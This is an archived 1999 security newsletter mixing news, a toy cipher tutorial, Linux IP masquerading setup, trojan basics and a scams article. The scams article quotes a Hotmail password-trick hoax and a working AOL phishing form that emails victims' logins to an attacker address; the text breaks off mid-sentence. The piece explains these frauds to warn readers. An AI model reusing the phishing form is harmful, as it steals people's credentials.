Copy Link
Add to Bookmark
Report
Default Newsletter Issue 03
--------------------------------------------------------------------------------
Default newsletter Issue #3
http://default.net-security.org
27.08.1999 Help Net Security
http://www.net-security.org
--------------------------------------------------------------------------------
TABLE OF CONTENTS
-----------------
I. Editorial
II. Last weeks news on Help Net Security
a) Help Net Security news headlines
b) Defaced Pages
III. Y2K: As the millennium approaches
IV. A look into basic cryptography
V. Internet privacy: Freedom Network
VI. Macintosh Security: F33r my hybride M4c, I'm coding!
VII. Computing: A closer look at hard- and software
VIII. Linux: IP Masquerading
IX. Infection and vaccination
X. Freedom of speech - related incidents
XI. Scams - Getting something by all means
XII. Intrusion and detection part two
I. Editorial
------------
Hey people. We received good comments on Default newsletter from both individuals and
security professionals. We have only 2 issues behind, but we will be even better (of
course with your feedback and help). If you would like to write an article for Default
newsletter please do e-mail us. Any help is appreciated.
As you can see, this issue is little bit shorter. That is because Doug Muth didn't
came yet from his holidays and Thejian and me were so busy this week. So do expect next
Default newsletter to be bigger and better than the previous ones.
In case you want to mirror Default newsletter on your site e-mail us also;)
Subscribing to Default newsletter:
send an e-mail to majordomo@net-security.org with a body message subscribe news your@email
Berislav Kucan
aka BHZ, webmaster Help Net Security
bhz@net-security.org
Xander Teunissen
aka Thejian, co-webmaster Help Net Security
thejian@net-security.org
II. Last weeks news on Help Net Security
----------------------------------------
a) Help Net Security news headlines
- Friday 20th August 1999:
Default #2 released
ABC compromised
Belgian bank compromised
Intel extends on-line privacy ban
Homophobic web site "stolen" by hackers?
Indonesia responds to cyber war threats
Watching workers
Carding in Newcastle
- Saturday 21st August 1999:
Linux trojan in portmap.c
FTP.exe overflow
Biometrics in prisons
Office 2000 also vulnerable to Jet flaw
Former CIA director kept state secrets on home PC
Furor rising over PV wiretap plan
Student draws first net piracy conviction
- Sunday 22nd August 1999:
MS security bulletin #30
Sun says US army is testing Jini
Hardencrypt
E-commerce group formed to combat fraud
ReDaTtAcK busted
- Monday 23th August 1999:
Firm nabs cracker with intrusion detection tool
First Net convict will do no time
GAO risk-assessment report
Sprint plans service to detect viruses
US Government and inavasion of privacy
East Timorese domain host denounces cyberwar
Secure your web site
DOD speaks on Y2K
Bomb for Microsoft manager
- Tuesday 24th August 1999:
ISS X-force advisory on Lotus Domino server 4.6
Technology keys to tracking down Internet crime
Govt. home-invasion bill
Hackers scanning for trouble
Norton AntiVirus 2000 is out
Secret searches from DOJ
SSL CPU consumption causes concerns
Unix: It doesn't need to be so insecure
- Wednesday 25th August 1999:
Shoutcast compromised
HK police to establish computer crime team
Smith admitted to creating Melissa
New IE5 bug worst then ever?
Audit office blasts agencies' serious security flaws
Malicious attack on linux-kernel mailinglist
More cyber-war threats
- Thursday 26th August 1999:
Taiwan circles wagons in cyber-warfare
UK webhosting company hit by virus
Netscape issues web-server fix
Windows and bugs? Nooooo?
CWI cracks 512 bit key
Mounting an anti-virus defense
Tracing stolen computers through RC5
Self destructing e-mails? Nice
Y2K problems in Pakistan
Retrospective on cracking contest
Y2K test
http://net-security.org - Daily security related news
http://net-security.org/news - News archives
http://net-security.org/headlines.shtml - Add HNS headlines to your web-site
b) Defaced pages: (mirrors provided by Attrition (http://www.attrition.org))
Site: Red Hat Indonesia (www.redhat.or.id)
Mirror: http://default.net-security.org/3/www.redhat.or.id.htm
Site: Official Web site of Limp Bizkit (www.limpbizkit.com)
Mirror: http://default.net-security.org/3/www.limpbizkit.com.htm
Site: Monica Lewinsky's site (www.monicalewinsky.com)
Mirror: http://default.net-security.org/3/www.monicalewinsky.com.htm
Site: Madison Square Garden (www.thegarden.com)
Mirror: http://default.net-security.org/3/www.thegarden.com.htm
Site: The State University of West Georgia (www.westga.edu)
Mirror: http://default.net-security.org/3/www.westga.edu.htm
Site: Rock.com's Rolling Stone's Web site (www.stones.com)
Mirror: http://default.net-security.org/3/www.stones.com.htm
III. Y2K: As the millennium approaches
-------------------------------------
These weeks' Y2K headlines:
The computer network used by many Vermont police agencies and other
emergency services went down for two days this week while technicians
were preparing the system for the year 2000. While it was down,
prosecutors had problems getting police paperwork, reporters couldn't
get routine releases, and motorists needing copies of accident reports
were out of luck. Officials do not yet know why the computer crashed.
They do know it happened as technicians were upgrading the system to
prepare for Y2K. It took more than two days to get the system running
again. In the meantime, much of the record-keeping had to be done the
old-fashioned way: with pen and paper.
PC Week reported about MS Excel Y2K problems:
"Unless users of Microsoft Corp.'s Excel download scanning tools from
the company's Web site, their spreadsheets could go haywire when they
open their files on Jan. 1.
A Boston-based technology management consulting company has found that
an Excel year 2000 error causing drastic math errors went undetected
by a handful of Y2K analysis tools.
The core of the problem is that Excel versions through Excel 2000 have
a DATE() function that treats all two-digit years as 20th-century dates,
regardless of how Excel is configured to handle two-digit dates. As
a result, spreadsheets that use the DATE function are particularly
vulnerable to Y2K problems. (By default, Excel 97's and Excel 2000's
other date functions, as well as the software's data entry routines,
treat two-digit dates less than 30 as part of the 21st century)"
The Millennium Bug that promised to swell U.S. courts with lawsuits
arising from damage that may occur if a computer system fails to
recognize the Year 2000 so far has resulted in only 74 cases filed,
according to a report released Monday by PricewaterhouseCoopers.
The trickle has the potential to turn into a full fledge flood after
the clock strikes midnight 1999, some experts said.
As of June 30, there were only 74 cases filed in state and federal
courts against 45 defendants that related to the Year 2000 computer
glitch (Y2K), according to the report.
Karen Shaw completed her 39-day trek across the state in which she
set out to promote Y2K awareness to rural residents of Oregon. 49 year
old teacher started her journey to show others that Y2K is coming very
soon, and they must be prepared. Shaw left Medford with only $20 but
said she lived on the generous donations of food and cash from people
she encountered along the way. She said: "I did not come across any
panicked people, but very practical, grounded, spiritual, caring people
who are just doing what their hearts tell them to do".
Hundreds of people in Japan complained Sunday after their automobile
navigation systems went haywire - the result of a Y2K-like glitch in
the satellite system used in navigation devices worldwide. Screens went
blank and bizarre symbols turned up on the electronic navigators,
essential for millions of drivers in a country where urban streets are
a chaotic jumble. Pioneer Corp, a major manufacturer of car navigation
systems, received about 600 calls on its help hotline, said company
spokesman Hidehiko Shimizu. Shimizu said callers were directed to the
nearest repair shop, where their systems were fixed for free.
Y2K TOOLS
---------
TITLE: Outlook Express Year 2000 Update
SIZE: 140 Kb
TYPE: Freeware
REQUIREMENTS: Windows 95/98/NT, Outlook Express 4.01
DOWNLOAD: http://default.net-security.org/3/en-x86-Q234681.exe
INFO: Part of Windows 98 Service Pack 1, this program will resolve a
year 2000 issue with Outlook Express 4.01. The year 2000 issue occurs
when receiving an IMAP mail message or a News message with a two-digit
year as the sent date. The date can be misinterpreted under certain
conditions. For example, if the two-digit year is anything other than
'99, Outlook Express assumes the century value is the same as the
current century. If the current year is 2000, and a two-digit date is
received as '97, then the year will be interpreted as 2097. However,
there is one special case when different logic is applied. If a
two-digit year of '99 is received and the current year is a multiple
of 100 (e.g., 2000), the year will be interpreted as the current year
plus 98 (e.g., 2098).
Berislav Kucan
aka BHZ
bhz@net-security.org
http://net-security.org
IV. A look into basic cryptography
----------------------------------
This is where I left off when I was working on the HOWTO last.... so
from here on in is new and (slightly) improved.
I probably have my terminology wrong, but the next is what I think is
called an output feedback cipher.
It takes the output from one step of applying the cipher, and uses
that to apply the cipher to the next part.
This is the most simple method of an output feedback that I could think
of.
First index the alphabet in some manner, it could be using ascii values,
or it could be a simple 1-26 method (I suggest ascii because then you
will allow for punctuation, I used a simple 1-26 because it is easier
to explain the cryptosystem).
A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=10 K=11 L=12 M=13 N=14
O=15 P=16 Q=17 R=18 S=19 T=20 U=21 V=22 W=23 X=24 Y=25 Z=26
This is a very basic transposition cipher as is, but will soon change.
The algorithm in mathematical terms is:
(N+P(1))%26=C(1)
(N+C(1)+P(2))%26=C(2)
(N+C(2)+P(3))%26=C(3)
(N+C(3)+P(4))%26=C(4)
...
(N+C(r-1)+P(r)=C(r)
This may seem complicated, but its not.
N is a random number that will be passed on as a key. I suggest a
larger number to protect yourself from a brute force attack. Do not
use a number divisible by 26. In fact, for safety's sake, try using a
larger prime, or a product of two smaller primes.
C(1) is the first ciphertext letter
P(1) is the first plaintext letter
r is the total number of characters in the message.
% is the mathematical symbol for the function modulus.
Modulus is like the remainder after dividing an integer by another integer.
So 28%26=2
and 942%26=6
(if your calculator doesn't handle modulus, a simple way to do it would be...
942/26=36.2307692307692307692307692307692
36.2307692307692307692307692307692-36=.2307692307692307692307692307692
.2307692307692307692307692307692*26=6
(round, your calculator cant handle these decimals -windows calc in
scientific mode can handle modulus, the key you are looking for is Mod)
You take your message. Lets take the word hello for simplicities sake.
HELLO
first change it to corresponding numbers.
8 5 12 12 15
our key number will be... 73. (once again, I suggest a more secure key
number than this, but this will serve our purposes well.)
1 2 3 4 5
8 5 12 12 15
Restate the Algorithm...
(N+P(1))%26=C(1)
(N+C(1)+P(2))%26=C(2)
(N+C(2)+P(3))%26=C(3)
(N+C(3)+P(4))%26=C(4)
...
(N+C(r-1)+P(r)=C(r)
And begin applying the algorithm:
H (73+8)%26=3
E (73+3+5)%26=3
NOW you see the power of a more complicated cipher. Here 3 stands for
both H AND E
L (73+3+12)%26=10
L (73+10+12)%26=17
Once again, the power of a more complicated cipher. while 3 stands for
both H and E, L is represented by both 10 and 17.
O (73+17+15)%26=1
3 3 10 17 1
Then take these numbers, and transfer them back to letters.
A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=10 K=11 L=12 M=13 N=14
O=15 P=16 Q=17 R=18 S=19 T=20 U=21 V=22 W=23 X=24 Y=25 Z=26
CCJQA
Now you ask how do you get back to the original "HELLO"?
Well first you need to find a way to tell someone the key number.... I
suggest appending it to the beginning of the message, go back to how it
was in numbers. (Note, if someone knows the method you used to hide the
key number in the message, the security of the message is lost. This is
the case with all single key cryptosystems.)
3 3 10 17 1
here the code number was 73. that's 2 letters.
add 2 7 3 to your message in the beginning
2 7 3 3 3 10 17 1
then make it the text
B G C C C J Q A send that to someone. They extract the numbers, and then
the key
number of 73.
Here's an idea, I will make this section somewhat interactive.
If you can decrypt this message back to the original text of HELLO,
please send your analysis of how to decrypt it using mathematical terms
to crypto@net-security.org.
Ill go over all the emails and post who was first, and then go over it
in the next issue.
Have fun.
-Iconoclast
V. Internet privacy: Freedom network
-----------------------------------------
The Freedom Network plays an integral role in Zero-Knowledge's
absolute privacy solution - Freedom.
Here's a quick look at what exactly the Freedom Network is
and what it does.
You'll often hear Freedom referred to as client/server
software, but what does this really mean? Well, the
"client" part is the software you install on your personal
computer and the "server" part is the software that runs
the Freedom Network.
The Freedom Network is a series of servers distributed
among ISPs and organizations around the world.
Internet traffic normally travels from source to
destination unsecured (i.e. not encrypted) while passing
through certain servers which can be easily identified.
This is like sending confidential information using a
postcard - anyone who handles the postcard knows the
sender, the recipient and the contents. This unsecured
delivery system makes message interception, falsification
and tracking possible.
To solve this problem, Freedom encrypts all Internet
traffic and routes it through a series of anonymous Freedom
servers, known as the Freedom Network.
Each server in the chain knows only the previous and
following servers in the path, and nothing about the traffic
(data) that it's handling. This makes the system extremely
secure since no single server knows both the origin and the
destination of the traffic.
In fact, no one, not even your ISP, can monitor your web
activities.
Does My ISP Need A Freedom Server For Me To Use Freedom?
It's important to note that your ISP doesn't need to run a
Freedom Server for you to enjoy the benefits of Freedom. If
they do opt to host one, however, you may notice an increase
in browsing speed while running Freedom. This will be
explained in greater detail in the next section.
- Network Speed
We often talk about what effect running Freedom will have
on your Internet connection speeds. These are also known as
"latency" issues.
Freedom employs a number of systems to foil any attempts at
analyzing Freedom user's Internet activities. The net
effect of these systems can result in slightly slower
connection speeds for some users. The exact latency, if
any, that a user will experience while running Freedom
depends on many factors, including;
- proximity to a Freedom Server
- geographic location relative to the Internet backbone
- the speed of your connection
- random Internet bottlenecks or "traffic jams"
When a user running Freedom connects to the Internet
through their ISP, that connection will use a greater
amount of bandwidth than a non-Freedom connection. As
mentioned above, this is due to the extra systems Freedom
employs to ensure user privacy.
This extra bandwidth consumption will be more taxing on an
ISP's servers as the Freedom user's traffic passes though
their system on its way to the first Freedom Server on the
Freedom Network.
If, however, the user's ISP is hosting a Freedom Server,
that server will be able to intercept this traffic much
earlier, thereby streamlining the entire process. This, in
turn, will result in quicker connection speeds for the
Freedom user.
To sum up, the closer a Freedom user's computer is to the
first Freedom Server, the less latency a Freedom user will
experience. Since the closest a user can possibly get to a
Freedom Server is if their ISP is running one - alerting
your ISP to the benefits of running a Freedom Server is a
good idea! :-)
For an up to date listing of worldwide Freedom Server
operators, please visit:
http://www.zeroknowledge.com/partners/founders.asp
Please keep in mind that this list gets bigger every day
as more server operators sign up so be sure to check back
often.
- Security Issues
"How is it possible that my ISP can't monitor my activities
since all my communications pass through their servers?"
Simple - all the data leaving your machine is encrypted
using strong crypto, which means that no one, not even
your ISP, can watch what you're doing.
In fact, whether you're sending email, surfing the Net,
chatting or posting to newsgroups, Freedom ensures that
your activities remain private!
Why should I trust your security when other supposedly
invulnerable codes and systems have been cracked?
- Software
Zero-Knowledge uses established public algorithms that have
proven to be impervious to attack. Well-known public algorithms
like Diffie/Helman, Triple DES, Blowfish and others ensure that
the system will remain secure. ZK is uncompromising in its
testing and implementation of encryption technology, using only
established algorithms with unbreakable bit lengths - we do NOT
cut corners.
- The More Bits, The Stronger The Encryption
As a Canadian company, ZK can export encryption technology far
stronger than the US Government's 56-bit encryption export standard.
A document encrypted with 56-bit key length would have
72,057,594,037,927,900 possible keys. Freedom's encryption begins
at 128-bit key length, meaning it has
340,282,366,920,938,000,000,000,000,000,000,000,000 possible keys.
A supercomputer capable of trying one million keys per second in
a brute-force attack would require 10,000,000,000,000,000,000,000,000
years to find the right key. That's a long time.
- Personnel
A number of experts in the field of privacy and cryptography have
estimated that there are perhaps five people in the world capable of
designing and lending credibility to a system of this complexity. ZK
Chief Scientist Ian Goldberg appears on that short list.
ZK sought out Mr. Goldberg because of his reputation for cracking
other supposedly secure systems. As a grad student at USC Berkeley's
Internet Security Applications Authentication and Cryptography Group,
Ian cracked the 40-bit DES code in the RSA Data Security Challenge in
just three and a half hours. He also earned international recognition
for his part in breaking the Netscape SSL encryption system, as well
as the cryptography system used in the GSM cellular phone standard.
- Peer Review
Freedom has always been and will continue to be opened up for independent
review by acknowledged industry experts.
-- Bruce Schneier of Counterpane Systems will audit the source code
line-by-line to ensure that no cracks, holes or errors exist in the
encryption implementation. Mr. Schneier, another short-list member,
is well-known as a veteran cryptographer and author of Applied Cryptography:
Protocols, Algorithms, and Source Code, widely recognized as the bible of
cryptography.
Complete Privacy
ZK puts its customers' privacy first - with no exceptions. Unlike
key-escrow or third-party systems, Zero-Knowledge (as implied by its name)
is unable to determine who is behind a given pseudonym -- even under threat
of force.
Jordan Socran
Zero Knowledge Systems
(http://www.zeroknowledge.com)
VI. Macintosh security: F33r my hybride M4c, I'm coding!
-------------------------------------------------------------
Most underground mac users are facing the same problems: only very few
people are actually coding network security tools on Mac. The main
reason is that coding a tcp/ip stack would take hundred of lines just
to initialize. Today many products are offering a easy approach to
programming, developing a project in RealBasic (http://www.realsoftware.com)
is much more easier than in CodeWarrior (http://www.metrowerks.com)
even if each have sepecificities and use different language.
Security software are ,usualy, not very big since they're focused on one type of
vulnerability.
It takes a long time to code, to debug a program.Another way to create
your own tools is to use other languages, faster to code and to use.
Many cross platform languages exist.Most useful are C/C++, Visual Basic,
perl, ph3, java, rebol and much more. Rebol is a new great language 100%
network oriented (http://www.rebol.com), it easy to code. You can do
many things from basic mail client to databases, table builder, port
scan. In few minutes you can build for example a scanner for a remote
vulnerability on ip ranges. I made few month a cgi-check like in rebol,
it scans around 70 famous vulnerabilities it took few minutes to
adapt it from a C source. Plus the code is used by a virtual machine
(available for 17 OS), and it quiet fast. Don't expect an well designed
software with full of color because it's commande line only.
Another language is perl. Many sources are available in the security
domain, you can easily use those with Macperl and or with a local
webserver. Make sure those sources are likely to be used on your os to
even think about using a firewall admin tool in perl.... Anyway if you
plan to use other languages that can't run on MacOs you can use a
emulation, or install Linuxppc.
The macintosh with tools like "realbasic" allow you to build
software in an almost ligne free of code way.Everything is performed
graphically, except all commands.
The compiler allows to build software for macOs and for wintel.
For java it's more difficult to code even if tools jdk are
available for mac.
It'll ask you alot of patience.If you just start programming, and want
to learn fast you'd better start with RealBasic.Many people from the mac
underground scene code with realbasic, for example Portsniffer
(http://software.theresistance.net) is a great product.It's one of the
fastest port scanner I've ever seen on Mac. Another alternative is MacOX,
a unix like made by Apple.Many unix tools are available or usable on
this OS.It's a Unix easier to configure since MAcos computer have less
type of hardware. Before you choose any languages you'd better learn how
to code, sometimes it takes years to claim to know a language.Don't
for get that only the limit you have is your imagination!
deepquest
deepquest@default.net-security.org
All rights not reserved- Serving since 1994
http://www.deepquest.pf
VII. Computing: A closer look at hard- and software
----------------------------------------------------
Intel Celeron CPU has been introduced at the end of June 1998 with the version at
266 MHz of clock, aiming at balancing the success of AMD K6-2 processor released a
month before. It used the Deshutes Core at 0.25 microns of Pentium II CPUs but it
didn't have L2 cache; this technical solution allowed to obtain high performance
with floating point calculation due to the floating point processing unit (FPU)
identical to that used with Pentium II CPUs, but it is a big gap with integer
calculations, both in comparison to K6-2 and Pentium II, due to the lack of L2 cache.
In July 1998 the version at 300 MHz of clock has been released always without L2 cache,
while at the beginning of September the versions 300A and 333 MHz have been launched,
with L2 cache at 128 Kbytes working at the clock frequency (against 512 Kbytes at half
clock frequency of Pentium II CPUs) and put within the Core of the processor (on die).
The introduction of the L2 cache allowed to reduce the gap with performance with integer
calculations of the previous versions of Celeron CPUs making this processor a perfect
solution in every field. The technical features of Celeron CPU up to September 1998 can
be summarized as following:
· Deshutes core at 0.25 microns (as for Pentium II CPUs), which is called Mendocino for
CPUs including L2 cache and Covignon for those without L2 cache;
· L1 cache at 32 Kbytes divided in two parts each with 16 Kbytes respectively for
instructions and data (as for Pentium II);
· L2 cache at 128 Kbytes working at the clock frequency and put on die (in Pentium II it
amounts at 512 Kbytes working at half clock frequency and put on the processor cartridge,
outside the cpu's Core);
· Frequency multiplier locked both upwards and downwards;
· Bus frequency at 66 MHz against 100 MHz of Pentium II CPU;
· SEPP package, that is based on cartridge and use of Slot 1 motherboard (the same used
by Pentium II CPUs).
Intel marketing has always maintained a low cost for Celeron processors, on one side to
compete with AMD K6-2 on low-end market, on the other to avoid to add an expensive product
to Pentium II. Let's note two aspects:
· Celeron uses a bus frequency of 66 MHz while that of Pentium II is 100 MHz; if in practice
the differences in performance between the two solutions, with the same clock frequency,
are reduced, to the user the first seems to be cheaper, while the second seems to be more
"professional" so many buy systems based on Pentium II with more profits for Intel.
· The performance of Celeron Mendocino and Pentium II, with the same clock frequency, are
almost aligned; Pentium II has a big advantage if used with server, where the presence of
L2 cache 4 times bigger, even if working at half clock frequency, is evident. For this
reason, Intel has always maintained an high clock difference between the to CPUs, so to
avoid that power users buy Celeron with higher frequency, less profitable than Pentium II.
At the beginning of 1999 a new version of Celeron Mendocino CPU has been released; if the
technical features are the same, the package of the CPU, that is SEPP one, has been
substituted by a PPGA one:
SEPP Package: it is installed on Slot 1 and it is similar to a Pentium II CPU without
external plastic cover; note in the middle, the CPU core and the space on its sides where
there are the chips of the L2 cache with Pentium II CPUs.
PPGA Package: very similar to a Pentium MMX CPU it is more compact in comparison the SEPP
version and it is installed on Socket 370.
Officially the reasons which led to the introduction of PPGA package aimed at reducing
the production costs of the processor, as the SEPP package, an heritage from Pentium II,
wasn't worth to exist anymore as the L2 cache is anymore put on it but directly within
the CPU Core.
Another reason, linked to marketing, is that of making the processor market more selective:
Slot 1 for more "professional" systems based on Pentium II and Pentium III processors,
Socket 370 for those cheaper based on Celeron CPU. Up to the version at 433 MHz both
variants of Celeron, SEPP and PPGA, were available, while from the version at 466 MHz on
SEPP was almost completely abandoned.
Celeron CPU was very successful due to its general performance in every field and to its
high overclockability which characterized almost every version; with these processors it
was possible to achieve high clock frequencies, higher than those of Pentium II processors,
with a very reduced investment. This article aims at checking the overclockability of
Celeron CPU and finding, where possible, which is the best version of Celeron CPU in
comparison to the price and the performance.
Damir Kvajo
aka Atlienz
atlienz@default.net-security.org
VIII. IP Masquerading: Multi-computer access to a network via single interface on the server
-----------------------------------------------------------------------
IPmasq basis:
When you set up IP Masquerading system on your Linux servers,
other machines on the *local* network will be able to use
the single network interface on the server. The most common usage
is to provide internet access to other machines, which do not
have their own connection.
The difference between Linux IPmasq and Windows tools (i.e. Wingate)
The is a big difference between the two. IPmasq is the "IP forwarding
system", while Wingate acts as a proxy. So, to make the machine
use the wingate, each application has to be configured separately,
while to use IPmasq, one just have to set up a "default gateway"
for the machine. Further adjustments of client permissions are set
on the server side (by modifying the firewall rules). Also,
IPmasq is capable of forwarding any kinds of protocols, even those
which does not have a special IPmasq helper application.
Kernel options.. To enable IP masquerade in the kernel, select:
- ip firewalling- packet filter firewall on a Linux box
- ip always defragment- neccessary for ipmasq to work. The packet is
defragmented (put into one piece from the network fragments) on the server
and then goes "to the court".
- ip masquerading- actual ip masq support
- transparent proxy support- by selecting this option, client machines think
they communicate with the end server, while infact it is a local proxy.
- ICMP masquerading- adds IPmasq ICMP support (without this, the system
does it only for UDP, TCP (and ICMP errors).
- ipmasq special modules support
- ipautofw masq support
- ipportfw masq support
(optional)
- optimize as router
Tools to get:
- ipmasq (the automatic ipmasq script, very useful, just be sure to
get the new one with the ipchains support in it)
- ipchains
- ipautofw
- ipportfw
- ipmasqadm (special modules support)
Once you are finished with the kernel configuration, compile it and
install the new kernel. Add:
echo "1" > /proc/sys/net/ipv4/ip_forward
to some of your system initialization scripts (or do it manually).
After you raise the interface you want others to use (usually ppp0),
just run "ipmasq" to recompute firewall rules. By default, IPmasq
allows only the local network to use the interface.
Client side adjustments:
Linux:
as root, execute:
route del default; route add default gw your.servers.ip.address
You can see the current routing table by issuing "route", active
connections with "netstat", interfaces with "ifconfig"
Windows:
as any user (9x) click Start->Settings->Control panel->Network->
TCP/IP-network device and in the Gateway tab, add your server's IP
to the list.
dev
dev@net-security.org
IX. Infection and vaccination
----------------------------
Since school is back in for a lot of people, the number of trojans
being made/updated has decreased(same with the length of this article).
So, this is the first of a few articles that simply explain general
info about trojans, to help remove them. We also have info on the new
LockDown 2000.
As most people know a trojan is a program that says it will do something
and then does something else. Currently the only security hole trojans
take advantage of is someone willing to run a program. Here is the
general way most trojan infect people:
1. Someone is tricked into running the trojan
2. Then it copies to another location
3. After that it starts listening for connections
4. Writes to the registry so it will load with Windows
Windows lets programs autoload when booting many different ways. Just
about everyone knows about the startup folder on the start menu. Most
trojans don't use this method, though we have seen at least one that
did. Another autoloading method is via the registry. This is the most
common way a trojan uses to start with windows. While lesser known is
the win.ini and even system.ini.
A common thing to do among trojan users is to "bind" the trojan they
want to infect someone with. Binding allows them to make a harmless
program into a dangerous one. Popular trojans such as DeepThroat and
SubSeven come with such tools. While many separate tools exist and are
easily found that do the same(such as silkrope). Binding also makes it
more difficult to be picked up by virus/trojan scanners, but it still
is possible.
We are lucky to view and get info on LockDown 2000 Version 4.0
Pre-Release. This version fixes some minor bugs and adds some more
control to the user. Also another handy feature is upon exiting it
saves the configuration changes you made. Plus the trojan count has
been increased to 378. Unfortunately the price is still probably high
at 99 US dollars. We also have not had the chance to personally test
it, maybe by next week we can.
zemac
zemac@dark-e.com
http://www.dark-e.com
X. Freedom of speech - related incidents
------------------------------------------
*******************************************************************
Independence is my happiness, and I view things as they are, without
regard to place or person; my country is the world,
and my religion is to do good.
- Thomas Paine
*******************************************************************
Every day the battle between freedom and repression rages through the global ether.
Here are this week's links highlights from NewsTrolls(http://www.newstrolls.com):
----------------------------------------------------------------------
Weekend August 20-22
US redoubling efforts to
<http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_3.html>
invade encrypted privacy
And the US DOJ wants easier
<http://www.washingtonpost.com/wp-srv/business/daily/aug99/encryption20.htm>
covert action capabilities
-----------------------------------------------------------------
Monday August 23
Recently freed Lafitte says the World Bank is to blame
<http://www.insidechina.com/features.php3?id=87242.>
for the detentions...
"Lafitte, a Tibetan expert, said he had grave fears about the safety
of his local translator, Tsering Dorje, and for Meston, who reportedly
suffered spinal and internal injuries when he jumped from a building
while trying to escape police. "The World Bank must bear direct
responsibility for what happened and must act with its unique leverage
as the biggest provider of capital to China to do something to help both
the American, who is in trouble but at least has the American government
to help him. "And particularly I feel it's the responsibility of the
World Bank to do something for our translator, who has no government he
can turn to...to protect him," he said."
Under Chinese detention for investigating World Bank program,
<http://www.washingtonpost.com/wp-srv/inatl/feed/a30394-1999aug23.htm>
Meston, an American, somehow fell out of a 3-story building and broke his back...
"The men assigned to monitor Lafitte told him at least three times that he was
lucky he was Australian, and not American, because the United States had bombed
China's embassy in Belgrade. "America is always trying to hold us back,
trying to make us weak," he recalled one saying."
-------------------------------------------------------------------
Tuesday August 24
The Federal Reserve Board's opposition to
<http://www.innercitypress.org/frreport.html>
the Freedom of Information Act...
Thousands of Mexican Indians and Zapatista supporters
<http://asia.yahoo.com/headlines/240899/world/935433360-90823183648.newsworld.html>
march in protest against military presence in Chiapas
African consumers speak out on
<http://www.africanews.org/atlarge/stories/19990823_feat5.html>
product dumping and market liberalization at their expense...
"According to Consumers International, consumption per capita in Africa has
gone down by 20 percent over the past 20 years. Under the current exchange
system, Least Advanced Countries will lose up to 600 million US dollars per year.
This painful reality is contrary to the main objectives of the WTO charter,
which requires signatory parties to recognise that the objective of their
trading and economic relations must be to raise the living standards of the
populations through employment of higher incomes. This is why African consumer
organisations have been pressing decision makers and multinational companies
to stop regarding consumer rights as a hindrance to trade and investment."
----------------------------------------------------------------------
Wednesday August 25
Iran paper calls for
<http://asia.yahoo.com/headlines/250899/world/935575740-90825100957.newsworld.html>
pre-election live TV debates...
"The Iran News also said conservative-dominated state television has
"shied away from the clash of ideas" and that its programming has
"not been able to quench the public thirst for more accurate and
impartial information.""
He Zhaohui, 32, labor activist gets 10 years in prison for
<http://www.insidechina.com/news.php3?id=87778>
"providing information to overseas organizations"
"He, who organized over 10 workers' demonstrations in Chenzhou in 1997 and 1998,
reported workers' protests in the province to democracy movements and human
rights organizations in the United States, the center said."
Over 10,000 pro-independence demonstrators
<http://asia.yahoo.com/headlines/250899/news/935568600-90825081041.newsasia.html>
rally in Dili ahead of East Timor elections...
More on
<http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_429000/429563.stm>
the rally...
"One of the organisers, Agio Pereria, said a clear message was being
sent to anyone planning to sabotage the ballot and abort the consultation
process. "Don't stop our people to reach the ballot box, because this is
a right," he said. "Each individual has his or her right to exercise the
right to vote in peace. And we hope that this is the message that we
send today."
diva aka Pasty Drone
NewsTrolls, Inc. , http://www.newstrolls.com
pastydrone@newstrolls.com
XI. Scams - Getting something by all means
------------------------------------------
This article will talk about common light Internet scams that could
happen to everyone who is not careful (but do note that they will often
happen to the people who have not great knowledge in computers,
especially in some basics of Internet surfing.
I don't know but lot of wannabe "hackers" think that they must start
with hotmail or yahoo hacking. They want to get someone's e-mail
password so they could read his e-mail, tease the "victim" and to
get some passwords (like if the victim has registered a webpage with
corrupted e-mail, attacker could easily snatch it). Even when I started
working on net-security, I got lot of e-mail saying like: "Help me to
hack a hotmail account". Better advise to this people is to start
learning something that could really be useful to them.
(1)
Hotmail "hacking" (this one is almost legendary, because this "way
of hacking" could be found on almost every Usenet group which has
hack in its topic.
<********************************************************************>
First, start with opening your own hotmail address.
Select compose.
Type in :
To: emailoftheattacker@hotmail.com
Subject: HTM.MSN.PW.REQ
(It is absolutely necessary to type in CAPITALS - subject
headers are case sensitive )
Message:
[First line] The login name of the person you want to hack
[2nd line] Your own password.
Because the automatic hotmail responder will require your
"systemadministrator password" which is in fact are your own password!
But the computer doesn't know that
[third line] x3iZ0k45-MSN-6TqGW-reqf47890sys (case sensitive)
How it works:
You mail to a systemadministrators automatic responder.
Usually only system administrators should be able to use this
( when for example getting lost passwords ), but when you try it
with your own password and mail the above explained message from your
hotmail account the computer gets confused!
MSN will respond with an automated message indicating the password requested
NOTE that if the message you send MSN is composed incorrectly,
or there has been a change in the status of the user queried,
you may not get an automated response
In this event, you will need to resubmit the request.
This "trick" usually takes about 4 hours to get a reply of.
<********************************************************************>
I am sad to say, but according to the critics of victims on usenet,
this fraudulent activity works on someone. This whole story with
sending your own password is bogus and it isn't also very imaginative.
I came across this page on Geocities, and it is just a little bit
modernized version of an old fraud, that we wrote about on net-security,
exactly 10 months ago (sending your password was then explained like
this: "By doing this, the computer which receives the email believes you
are a Hotmail System administrator, and sends you the password you
require within 1-2 hours").
(2)
AOL web fraud
I came across on this trick, by reading attrition's mirrors of hacked
pages. Originally the site for this scam was on www.arodnet.com with
a backup on pages.hotbot.com server. Just to note that this page is as
I'm writing this defaced again. So when you access this page it gives you
exactly the same look as the AOL NetMail site (www.aol.com/netmail).
You have a form where you can enter Screen Name and appropriate password.
When you enter it, form doesn't do what you think it is supposed to do:
it sends an e-mail message to the creator of it with your login and
password. Code follows:
<********************************************************************>
<form action="http://bewoner.dma.be/bew-bin/ukmailer.cgi" method=POST>
<INPUT TYPE="HIDDEN" NAME="recipient" VALUE="sabbs@hotmail.com">
<input type=hidden name="subject" value="You've Got Mail">
<input type=hidden name="redirect" value="http://pages.hotbot.com/biz/
deity/error.html">
<********************************************************************>
So it sends your information and you get a html note that you entered
the wrong password and it redirects you to the REAL Net Mail log-on
site. On this way, if you were not too cautious, you shared your info,
and you don't have a clue that you did it.
Just to add - Scammers obtaining a screen name or password could
potentially do considerable harm on an AOL member's account. An
account violator could use the member's communications features, such
as email and the instant messenger buddy list, or even purchase goods
with the member's credit card.
I was thinking about how this fraud trick could be even more realistic.
Well when you enter the password, new html file opens that says that
you must try again, and the Address bar in this issue says:
http://pages.hotbot.com/biz/deity/error.html
If you add some Java script and if you know for frame spoofing
